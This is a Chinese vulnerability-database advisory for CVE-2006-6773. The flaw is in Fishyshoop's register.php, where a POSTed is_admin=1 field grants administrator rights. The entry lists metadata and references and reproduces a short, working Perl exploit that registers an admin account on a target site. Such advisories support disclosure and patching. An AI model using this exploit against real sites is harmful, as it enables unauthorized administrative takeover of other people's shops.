FishyShoop 'register.php'非授权管理访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111858 漏洞类型 访问验证错误
发布时间 2006-12-25 更新时间 2007-01-02
CVE编号 CVE-2006-6773 CNNVD-ID CNNVD-200612-579
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3011
https://cxsecurity.com/issue/WLB-2006120145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-579
|漏洞详情
Fishyshoop是一款网上购物软件。Fishyshoop的pages/register/register.php文件会获取每个POST变量并将变量值注入到同一名称字段下新的记录中。如果注册时pages/register/register.php文件的is_admim变量被设置为1的话,则登录帐号就会在站点获得管理权限。
|漏洞EXP
#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

# milw0rm.com [2006-12-25]
|参考资料

来源:BID
名称:21731
链接:http://www.securityfocus.com/bid/21731
来源:BUGTRAQ
名称:20061224FishyshoopSecurityVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/455260/100/0/threaded
来源:VUPEN
名称:ADV-2006-5182
链接:http://www.frsirt.com/english/advisories/2006/5182
来源:SECUNIA
名称:23490
链接:http://secunia.com/advisories/23490
来源:SREASON
名称:2077
链接:http://securityreason.com/securityalert/2077